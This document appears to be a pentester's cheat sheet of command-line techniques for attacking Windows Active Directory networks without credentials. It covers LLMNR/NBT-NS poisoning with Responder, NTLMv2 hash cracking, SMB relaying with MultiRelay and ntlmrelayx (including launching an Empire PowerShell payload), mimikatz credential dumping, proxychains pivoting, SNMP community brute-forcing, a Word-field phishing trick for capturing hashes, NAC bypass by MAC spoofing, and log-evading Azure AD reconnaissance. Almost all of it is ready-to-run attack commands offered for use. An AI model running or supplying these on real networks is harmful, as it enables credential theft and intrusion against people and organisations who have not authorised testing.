Out of Domain (No credentials)


# Passiv network listening to identify machines
# By default, it uses interactive mode (incompatible with clean output)
# You can use the -P option to get off interactive
sudo netdiscover -p -i eth0
sudo netdiscover -p -i eth0 -P

# You can find the domain big using dig
dig -x IP

# If the NAC is blocking, you can listen broadcast and collect MAC address
# Use printer's MAC address to bypass NAC


# You can Man in The Middle using LLMNR and NBT-NS if they're bad configured
sudo responder -I eth0 -wFv

# If you get hashes, will be necessary to crack them
john --format=netntlmv2 --wordlist="/usr/share/wordlists/rockyou.txt" hash.txt 

Responder and Multirelay

# You can link responder and multi relay to own machines

# It's important to know that SMB Signing must be disabled on machines for multirelay.
# SMB Server must also be off on Responder. Responder will intercept and MultiRelay will relay hashes

# HTTP and SMB are OFF in Responder.conf
responder -I eth0 -rv
responder -I <interface> -r -d -w

# All captured hashes are stored and can be retrieved using the DumpHash.py script
$ sudo python DumpHash.py
# You can check for machines with disabled SMB Signing with RunFinger (impacket) or CrackMapExec
python RunFinger.py -i
cme smb <CIDR> --gen-relay-list targets.txt

# Then you will target one machine or one range for MultiRelay
python MultiRelay.py -t -u ALL
ntlmrelayx.py -tf targets.txt
ntlmrelayx.py -tf targets.txt -c <insert your Empire Powershell launcher here>

# Then you can pop an interactive shell
# And use for example mimikatz
mimi sekurlsa::logonpasswords

NTLM Relaying and Proxychains

# Using socks settings in case of multiple sessions to handle
# you can specify a target like this all://
# It will target smb://’, ‘mssql://’, ‘http://’, ‘https://’, ‘imap://’, ‘imaps://’, ‘ldap://’, ‘ldaps://’ and ‘smtp://’
./ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support

# HTTP and SMB are OFF in Responder.conf
responder -I eth0 -rv
responder -I <interface> -r -d -w

# If someone connects and is relayed
# You can see sessions
ntlmrelayx> socks

# To use sessions, proxychains can be set up
# /etc/proxychains.conf must be pointing toward the target host

# Then you can use different tools to interact
# For example, connect through SMB
# If password asked, whatever
proxychains smbclient // -U contoso/normaluser1
proxychains ./mssqlclient.py contoso/normaluser1@ -windows-auth

SNMP Communities

# You can use metasploit to enumerate known SNMP communities

# OneSixtyOne is another tool
onesixtyone <target> public

# Bruteforce using a dict
onesixtyone -c wordlist <target>

# Or you can use snmp-check
snmp-check -t -c public/private

Phishing with Responder

# Open Word -> CTRL + F9
# IMPORT "\\\\Responder-IP\\1.jpg"
# Right click and select "Edit Field"
# Tick "Data not stored in document"
# Save & close.
# Open the document -> free credentials :)

Azure AD Recon


# https://login.microsoftonline.com/getuserrealm.srf?login=username@gothamlab.onmicrosoft.com&xml=1
# If the NameSpaceType indicates "Managed", then the company is using Azure AD. 

# Discover accounts
# o365creeper can be used, it does not produce logs on the AD side